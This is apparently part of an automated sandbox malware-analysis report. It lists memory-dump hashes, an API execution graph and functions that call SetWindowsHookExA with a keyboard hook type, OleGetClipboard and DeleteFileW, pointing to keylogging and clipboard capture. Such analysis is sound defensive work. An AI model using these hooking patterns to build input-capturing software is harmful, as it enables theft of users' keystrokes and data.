                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 3a26b8eec562229c6fe21ef0244d46d94708714d155ba337f5362024e015c1ec
                                            • Instruction ID: 5c24db5624ae365a4da2750add0f86d67d9d65319fe79fcd893cdb882e92ecf3
                                            • Opcode Fuzzy Hash: 3a26b8eec562229c6fe21ef0244d46d94708714d155ba337f5362024e015c1ec
                                            • Instruction Fuzzy Hash: 5E1100B5800349DFCB10DF9AC984BDEBBF8FB48324F20841AE558A7210C375A984CFA5
                                            Function 0163D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61272a47945e978694d6164128af4e761b93aa7210a4a24bcf45031ea6ac9007
                                            • Instruction ID: 9e1e9b49ec9e0f1d1755e808a3792cd77d25d49c4bb813dd2fcfd7d313b7f9b7
                                            • Opcode Fuzzy Hash: 61272a47945e978694d6164128af4e761b93aa7210a4a24bcf45031ea6ac9007
                                            • Instruction Fuzzy Hash: 9621D371504240DFDB05DF58D9C0B2ABF65FBC8328F64C569E9094B296C336D456CAA1
                                            Function 030FD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704560757.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30fd000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25604ba9e58c2e8534c088f8a1173416213ff63d16121f32ff2f72be1fe7c6af
                                            • Instruction ID: fd5c77fd2db1b2f2b3e32b32cd505e15a71b3477473fe0c1867946ff727cbc9d
                                            • Opcode Fuzzy Hash: 25604ba9e58c2e8534c088f8a1173416213ff63d16121f32ff2f72be1fe7c6af
                                            • Instruction Fuzzy Hash: E5210471604200DFDB14DF14D9C4B2ABFA5FB84314F24CAADEA0A4B75AC33AD447CA61
                                            Function 030FD007 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704560757.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30fd000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98571ca9a1c7f91300579d2d0c28915f0b47492da43f47c56a0bd8c2adb485b6
                                            • Instruction ID: a2928248bbfa4b0fca1e43c42877a4cfcf8bce3939da4e55ea8cf89d23af57d2
                                            • Opcode Fuzzy Hash: 98571ca9a1c7f91300579d2d0c28915f0b47492da43f47c56a0bd8c2adb485b6
                                            • Instruction Fuzzy Hash: AA21A4755093808FCB12CF24D994715BFB1EB46214F28C5DAD9498F6A7C33AD40ACB62
                                            Function 0163D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: e9d4812ef422c9a556e73142f587e7b54e9642e1653bfc5b533dfe5eebf226b9
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 1C11E172504280CFCB02CF54D9C4B16BF71FB84328F24C6A9D8090B256C336D45ACBA1
                                            Function 0163D731 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c578c76a6838d9f5e35f3bd1fd4230c80ac80b7a077b9d8c7bbdcdf312bd2c17
                                            • Instruction ID: 62c9ea4c17af1ebf206886d9696b02c65909a38b9fc640a013a7eea09cf2e552
                                            • Opcode Fuzzy Hash: c578c76a6838d9f5e35f3bd1fd4230c80ac80b7a077b9d8c7bbdcdf312bd2c17
                                            • Instruction Fuzzy Hash: 7601D6714083849AE7128AA9CEC4777FFF8EFC1364F58C52AED094A296C379D845C6B1
                                            Function 0163D730 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 192cbda8e76a1c99633633f14fc3381f372fca97d8d34d38a5e79ad3380ce018
                                            • Instruction ID: f7549d833b0f4f1ddb1e762ae45c97862adf924d56497aacb0ccb14531b4e504
                                            • Opcode Fuzzy Hash: 192cbda8e76a1c99633633f14fc3381f372fca97d8d34d38a5e79ad3380ce018
                                            • Instruction Fuzzy Hash: 16F062724043849EE7118A1ACD84B66FFE8EB81774F18C55AED084E286C3799844CAB1

                                            Non-executed Functions

                                            Function 07983C68 Relevance: .4, Instructions: 351COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61cb63c3f643f7bcabd7ae3a87f6b14f62b7ff617fd35336ea4acc97777f8c03
                                            • Instruction ID: 697efb1239e774be287697777c8cd3edde07314035bb78b2497a8fc4960f8c11
                                            • Opcode Fuzzy Hash: 61cb63c3f643f7bcabd7ae3a87f6b14f62b7ff617fd35336ea4acc97777f8c03
                                            • Instruction Fuzzy Hash: 29D1AAB17007018FEB69EB75C450B6FBBFAAF89B08F10486DD1468B290DB35D842CB91
                                            Function 058F0040 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f26a648798dbbe17c6dde4030c9fa0340589cd70fff1f4a9bf8aa1f04292c5a2
                                            • Instruction ID: 6f3b3587cc2e690e61aff1b29d0621d1b0aa0a5e911beba9f9f79fd2a0d5ced9
                                            • Opcode Fuzzy Hash: f26a648798dbbe17c6dde4030c9fa0340589cd70fff1f4a9bf8aa1f04292c5a2
                                            • Instruction Fuzzy Hash: 8B1274B0801746CAE710EF65F94C289BBB1FB46318FB0C609D2656F6E9DBB8154ACF44
                                            Function 0324DE4C Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eaaacc5a86c878a073a0e03e9d5bc84217730f9f815bcb4ea317e7d9fba8b39
                                            • Instruction ID: 3e57d558f1ebc7fe1fa4ab75b766185a6716a243128d8dd82073425d16ea22e2
                                            • Opcode Fuzzy Hash: 0eaaacc5a86c878a073a0e03e9d5bc84217730f9f815bcb4ea317e7d9fba8b39
                                            • Instruction Fuzzy Hash: 6AA18136F103169FCF09DFB4D58459EB7B2FF84300B15856AE805AB265DB71E985CB80
                                            Function 058F0007 Relevance: .2, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb11821282c210144cdd8a67c8ca1fb85811421d3b1b5ed73e690c49a14ec76d
                                            • Instruction ID: c37eadcf7780c0aa343375e7e3c5101e5b7aa4c93dbb2fe6f03cb1695f94b00e
                                            • Opcode Fuzzy Hash: fb11821282c210144cdd8a67c8ca1fb85811421d3b1b5ed73e690c49a14ec76d
                                            • Instruction Fuzzy Hash: 78C1F8B18017468BE710EF65F94C289BBB1FB86324F75C609D1616F2E9DBB8148ACF44

                                            Execution Graph

                                            Execution Coverage:10.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.6%
                                            Total number of Nodes:191
                                            Total number of Limit Nodes:23
                                            execution_graph 25897 569d878 25899 569d888 25897->25899 25900 569d8b3 25899->25900 25901 569c304 25899->25901 25902 569d8c8 KiUserCallbackDispatcher 25901->25902 25904 569d936 25902->25904 25904->25899 25905 569c6f8 DuplicateHandle 25906 569c78e 25905->25906 25907 5696eb8 25908 5696ee3 25907->25908 25914 5697431 25908->25914 25919 5697440 25908->25919 25909 5696f66 25910 5695e1c GetModuleHandleW 25909->25910 25911 5696f92 25909->25911 25910->25911 25916 569746d 25914->25916 25915 56974ee 25916->25915 25924 569760f 25916->25924 25932 569769e 25916->25932 25920 569746d 25919->25920 25921 56974ee 25920->25921 25922 569760f GetModuleHandleW 25920->25922 25923 569769e GetModuleHandleW 25920->25923 25922->25921 25923->25921 25925 569761a 25924->25925 25926 5695e1c GetModuleHandleW 25925->25926 25927 569773a 25926->25927 25928 5695e1c GetModuleHandleW 25927->25928 25931 56977b4 25927->25931 25929 5697788 25928->25929 25930 5695e1c GetModuleHandleW 25929->25930 25929->25931 25930->25931 25931->25915 25933 56976ee 25932->25933 25934 5695e1c GetModuleHandleW 25933->25934 25935 569773a 25934->25935 25936 5695e1c GetModuleHandleW 25935->25936 25939 56977b4 25935->25939 25937 5697788 25936->25937 25938 5695e1c GetModuleHandleW 25937->25938 25937->25939 25938->25939 25939->25915 25940 5698998 25941 5698a00 CreateWindowExW 25940->25941 25943 5698abc 25941->25943 25717 56978eb 25718 56978f0 GetModuleHandleW 25717->25718 25720 5697965 25718->25720 25721 ded01c 25722 ded034 25721->25722 25723 ded08e 25722->25723 25729 5698b43 25722->25729 25735 569d2d3 25722->25735 25743 5698b50 25722->25743 25749 5696c3c 25722->25749 25753 5696c4c 25722->25753 25730 5698b76 25729->25730 25731 5696c3c GetModuleHandleW 25730->25731 25732 5698b82 25731->25732 25733 5696c4c 2 API calls 25732->25733 25734 5698b97 25733->25734 25734->25723 25736 569d2da 25735->25736 25737 569d361 25736->25737 25738 569d351 25736->25738 25773 569c2ac 25737->25773 25761 569d478 25738->25761 25767 569d488 25738->25767 25740 569d35f 25744 5698b76 25743->25744 25745 5696c3c GetModuleHandleW 25744->25745 25746 5698b82 25745->25746 25747 5696c4c 2 API calls 25746->25747 25748 5698b97 25747->25748 25748->25723 25750 5696c47 25749->25750 25836 5696c74 25750->25836 25752 5698c87 25752->25723 25754 5696c57 25753->25754 25755 569d361 25754->25755 25757 569d351 25754->25757 25756 569c2ac 2 API calls 25755->25756 25758 569d35f 25756->25758 25759 569d478 2 API calls 25757->25759 25760 569d488 2 API calls 25757->25760 25759->25758 25760->25758 25763 569d489 25761->25763 25762 569c2ac 2 API calls 25762->25763 25763->25762 25764 569d56e 25763->25764 25780 569d958 25763->25780 25785 569d968 25763->25785 25764->25740 25769 569d496 25767->25769 25768 569c2ac 2 API calls 25768->25769 25769->25768 25770 569d56e 25769->25770 25771 569d968 OleGetClipboard 25769->25771 25772 569d958 OleGetClipboard 25769->25772 25770->25740 25771->25769 25772->25769 25774 569c2b7 25773->25774 25775 569d5ca 25774->25775 25776 569d674 25774->25776 25778 569d622 CallWindowProcW 25775->25778 25779 569d5d1 25775->25779 25777 5696c4c OleGetClipboard 25776->25777 25777->25779 25778->25779 25779->25740 25781 569d987 25780->25781 25782 569da20 25781->25782 25790 569dedf 25781->25790 25796 569df20 25781->25796 25782->25763 25787 569d987 25785->25787 25786 569da20 25786->25763 25787->25786 25788 569dedf OleGetClipboard 25787->25788 25789 569df20 OleGetClipboard 25787->25789 25788->25787 25789->25787 25792 569def5 25790->25792 25791 569df3c 25791->25781 25792->25791 25802 569df68 25792->25802 25813 569df58 25792->25813 25793 569df51 25793->25781 25798 569df28 25796->25798 25797 569df3c 25797->25781 25798->25797 25800 569df68 OleGetClipboard 25798->25800 25801 569df58 OleGetClipboard 25798->25801 25799 569df51 25799->25781 25800->25799 25801->25799 25803 569df7a 25802->25803 25804 569df95 25803->25804 25806 569dfd9 25803->25806 25809 569df68 OleGetClipboard 25804->25809 25810 569df58 OleGetClipboard 25804->25810 25805 569df9b 25805->25793 25808 569e059 25806->25808 25824 569e220 25806->25824 25828 569e230 25806->25828 25807 569e077 25807->25793 25808->25793 25809->25805 25810->25805 25814 569df68 25813->25814 25815 569df95 25814->25815 25817 569dfd9 25814->25817 25820 569df68 OleGetClipboard 25815->25820 25821 569df58 OleGetClipboard 25815->25821 25816 569df9b 25816->25793 25819 569e059 25817->25819 25822 569e220 OleGetClipboard 25817->25822 25823 569e230 OleGetClipboard 25817->25823 25818 569e077 25818->25793 25819->25793 25820->25816 25821->25816 25822->25818 25823->25818 25826 569e230 25824->25826 25827 569e26b 25826->25827 25832 569dcc8 25826->25832 25827->25807 25830 569e245 25828->25830 25829 569dcc8 OleGetClipboard 25829->25830 25830->25829 25831 569e26b 25830->25831 25831->25807 25833 569e2d8 OleGetClipboard 25832->25833 25835 569e372 25833->25835 25837 5696c7f 25836->25837 25839 5698d57 25837->25839 25840 5695e1c 25837->25840 25839->25752 25841 56978f0 GetModuleHandleW 25840->25841 25843 5697965 25841->25843 25843->25839 25844 569e140 25846 569e14b 25844->25846 25845 569e15b 25846->25845 25848 569dbb0 25846->25848 25849 569e190 OleInitialize 25848->25849 25850 569e1f4 25849->25850 25850->25845 25851 e50848 25853 e5084e 25851->25853 25852 e5091b 25853->25852 25856 e51380 25853->25856 25863 e5149a 25853->25863 25858 e5138b 25856->25858 25859 e51322 25856->25859 25857 e51490 25857->25853 25858->25857 25860 e5149a SetWindowsHookExA 25858->25860 25869 569fbaf 25858->25869 25875 569fbc0 25858->25875 25859->25853 25860->25858 25864 e51396 25863->25864 25865 e51490 25864->25865 25866 569fbaf SetWindowsHookExA 25864->25866 25867 569fbc0 SetWindowsHookExA 25864->25867 25868 e5149a SetWindowsHookExA 25864->25868 25865->25853 25866->25864 25867->25864 25868->25864 25870 569fbc8 25869->25870 25871 569fc0d 25870->25871 25881 569fc20 25870->25881 25885 569fca2 25870->25885 25889 569fc10 25870->25889 25871->25858 25876 569fbc8 25875->25876 25877 569fc0d 25876->25877 25878 569fc20 SetWindowsHookExA 25876->25878 25879 569fc10 SetWindowsHookExA 25876->25879 25880 569fca2 SetWindowsHookExA 25876->25880 25877->25858 25878->25876 25879->25876 25880->25876 25883 569fc3d 25881->25883 25882 569fca0 25882->25870 25883->25882 25893 569ee20 25883->25893 25886 569fc5d 25885->25886 25887 569ee20 SetWindowsHookExA 25886->25887 25888 569fca0 25886->25888 25887->25886 25888->25870 25892 569fc1e 25889->25892 25890 569fca0 25890->25870 25891 569ee20 SetWindowsHookExA 25891->25892 25892->25890 25892->25891 25896 569fe28 SetWindowsHookExA 25893->25896 25895 569feb2 25895->25883 25896->25895 25944 e57258 25945 e5729e DeleteFileW 25944->25945 25947 e572d7 25945->25947

                                            Executed Functions

                                            Function 0569EE20 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1228 569ee20-569fe72 1231 569fe7e-569feb0 SetWindowsHookExA 1228->1231 1232 569fe74-569fe7c 1228->1232 1233 569feb9-569fed9 1231->1233 1234 569feb2-569feb8 1231->1234 1232->1231 1234->1233
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,00000000), ref: 0569FEA3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 5c66bb71f7ccce81c2c8522c0e89133eb6440916b195b17d23680b3d518bd6a1
                                            • Instruction ID: 8624dffa83b6ff36eed94a136b4c44c6f2fa15735aa7ff32ce31defa167f416f
                                            • Opcode Fuzzy Hash: 5c66bb71f7ccce81c2c8522c0e89133eb6440916b195b17d23680b3d518bd6a1
                                            • Instruction Fuzzy Hash: D32135B19042099FCB14DF9AC844BEEFBF5FB88320F10842AE419A7250C775A944CFA1
                                            Function 05698993 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1127 5698993-56989fe 1129 5698a09-5698a10 1127->1129 1130 5698a00-5698a06 1127->1130 1131 5698a1b-5698a53 1129->1131 1132 5698a12-5698a18 1129->1132 1130->1129 1133 5698a5b-5698aba CreateWindowExW 1131->1133 1132->1131 1134 5698abc-5698ac2 1133->1134 1135 5698ac3-5698afb 1133->1135 1134->1135 1139 5698b08 1135->1139 1140 5698afd-5698b00 1135->1140 1141 5698b09 1139->1141 1140->1139 1141->1141
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05698AAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 92024ff5d6c3d9704db3c10e6195951d5dd2f48c34f5729dc9c9323d105ad213
                                            • Instruction ID: 4cc421b2190923f3a11c24d7fb15a840533483c299669fd529ee31f0cb876918
                                            • Opcode Fuzzy Hash: 92024ff5d6c3d9704db3c10e6195951d5dd2f48c34f5729dc9c9323d105ad213
                                            • Instruction Fuzzy Hash: A051CFB1D103099FDF14CFAAC884ADEBBB6BF49310F24812AE419AB210D7759885CF91
                                            Function 05698998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1142 5698998-56989fe 1143 5698a09-5698a10 1142->1143 1144 5698a00-5698a06 1142->1144 1145 5698a1b-5698aba CreateWindowExW 1143->1145 1146 5698a12-5698a18 1143->1146 1144->1143 1148 5698abc-5698ac2 1145->1148 1149 5698ac3-5698afb 1145->1149 1146->1145 1148->1149 1153 5698b08 1149->1153 1154 5698afd-5698b00 1149->1154 1155 5698b09 1153->1155 1154->1153 1155->1155
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05698AAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 22c070da186222187d2c820d9ecc1c15635e1c57d8643c0f2a929e1fa5c2183b
                                            • Instruction ID: 5c9a3616796bf58a0e102642405ba034dd3878138b6040526d5df2cdd2555225
                                            • Opcode Fuzzy Hash: 22c070da186222187d2c820d9ecc1c15635e1c57d8643c0f2a929e1fa5c2183b
                                            • Instruction Fuzzy Hash: 3741C0B1D00309DFDF14CFAAC884ADEBBB6BF49310F24812AE419AB210D7759885CF91
                                            Function 0569C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1156 569c2ac-569d5c4 1159 569d5ca-569d5cf 1156->1159 1160 569d674-569d694 call 5696c4c 1156->1160 1162 569d5d1-569d608 1159->1162 1163 569d622-569d65a CallWindowProcW 1159->1163 1167 569d697-569d6a4 1160->1167 1170 569d60a-569d610 1162->1170 1171 569d611-569d620 1162->1171 1164 569d65c-569d662 1163->1164 1165 569d663-569d672 1163->1165 1164->1165 1165->1167 1170->1171 1171->1167
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0569D649
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 149a6175388fd0834b5bd4eabfcf7eab07ea6ec2c4f085b3059985e657e31363
                                            • Instruction ID: d184df3342609bb9b0b99be3c511ca35c918a6f3a17f3026b362cc59c9e508cb
                                            • Opcode Fuzzy Hash: 149a6175388fd0834b5bd4eabfcf7eab07ea6ec2c4f085b3059985e657e31363
                                            • Instruction Fuzzy Hash: BF410BB5A00345DFCB14CF99C488AAABBF9FF88314F24C459D519AB321D775A941CFA0
                                            Function 0569E2CC Relevance: 1.6, APIs: 1, Instructions: 78comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1173 569e2cc-569e328 1175 569e332-569e370 OleGetClipboard 1173->1175 1176 569e379-569e3c7 1175->1176 1177 569e372-569e378 1175->1177 1182 569e3c9-569e3cd 1176->1182 1183 569e3d7 1176->1183 1177->1176 1182->1183 1184 569e3cf 1182->1184 1185 569e3d8 1183->1185 1184->1183 1185->1185
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 43aa0155ef0b0770e692dd4439dc8947822e28c2485f1939fe1f17fad6190398
                                            • Instruction ID: 8ba31be7f9d75b2998d336c8b28a6b5d9def563150bb595ed9b90c5f63bc08f9
                                            • Opcode Fuzzy Hash: 43aa0155ef0b0770e692dd4439dc8947822e28c2485f1939fe1f17fad6190398
                                            • Instruction Fuzzy Hash: D33111B0901248EFDB14CFA9C984BCDBFF9AF48304F248059E444AB390D7B5A885CFA5
                                            Function 0569DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1186 569dcc8-569e370 OleGetClipboard 1189 569e379-569e3c7 1186->1189 1190 569e372-569e378 1186->1190 1195 569e3c9-569e3cd 1189->1195 1196 569e3d7 1189->1196 1190->1189 1195->1196 1197 569e3cf 1195->1197 1198 569e3d8 1196->1198 1197->1196 1198->1198
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 2d249399c827a78e9df72ef7ec488bb1b2ee91d3b4a144bc7fcc3a1b9bac4f97
                                            • Instruction ID: f3733ac0e8eb71cea16a78f030e7bdf154ce32f470f0c2d1ac70fbd605f1f0b1
                                            • Opcode Fuzzy Hash: 2d249399c827a78e9df72ef7ec488bb1b2ee91d3b4a144bc7fcc3a1b9bac4f97
                                            • Instruction Fuzzy Hash: C53102B0901208DFDB14DFA9C544B9DBBF9AB48304F248059E505BB390D7B59885CB95
                                            Function 0569C6F0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1199 569c6f0-569c6f5 1200 569c6f8-569c78c DuplicateHandle 1199->1200 1201 569c78e-569c794 1200->1201 1202 569c795-569c7b2 1200->1202 1201->1202
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569C77F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: d1fb9ad11cedd50527ab26fdc096be68f49cc00935a832dce41042d0bfa5bca8
                                            • Instruction ID: 7d604d1cd0a673c2ee9aeea20033ab7e14696bc5848b20b5d83e74aeb036f5d2
                                            • Opcode Fuzzy Hash: d1fb9ad11cedd50527ab26fdc096be68f49cc00935a832dce41042d0bfa5bca8
                                            • Instruction Fuzzy Hash: D121E3B5900258DFDB10CFAAD584ADEBFF9EB48320F14841AE958A7311D375A940CFA4
                                            Function 0569C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1205 569c6f8-569c78c DuplicateHandle 1206 569c78e-569c794 1205->1206 1207 569c795-569c7b2 1205->1207 1206->1207
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569C77F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c2386c947c98dda78d5939549fe40b906ce68472020994176901ad49d8878e64
                                            • Instruction ID: e5982f0277e42d28ff6790c86e62b6a29b4b466f909818352c2cd858a6f3051b
                                            • Opcode Fuzzy Hash: c2386c947c98dda78d5939549fe40b906ce68472020994176901ad49d8878e64
                                            • Instruction Fuzzy Hash: 6921E2B5900218DFDB10CFAAD984ADEBBF9FB48320F14801AE918A7310D375A940CFA4
                                            Function 00E57251 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1210 e57251-e572a2 1212 e572a4-e572a7 1210->1212 1213 e572aa-e572d5 DeleteFileW 1210->1213 1212->1213 1214 e572d7-e572dd 1213->1214 1215 e572de-e57306 1213->1215 1214->1215
                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 00E572C8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4138513589.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_e50000_26.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: c308644c1f3a126c1dc56679f0731e065669b339d5b1f211d92303b58d29f9fa
                                            • Instruction ID: a95f2727d33f2520ecfc73f8410e8ecc92021e90c5d6e17f70ec9f3834148f0f
                                            • Opcode Fuzzy Hash: c308644c1f3a126c1dc56679f0731e065669b339d5b1f211d92303b58d29f9fa
                                            • Instruction Fuzzy Hash: 752147B1D0066A9FCB10CFAAD4447EEFBB0EF48320F148569E858B7651D374A945CFA4
                                            Function 0569FE23 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
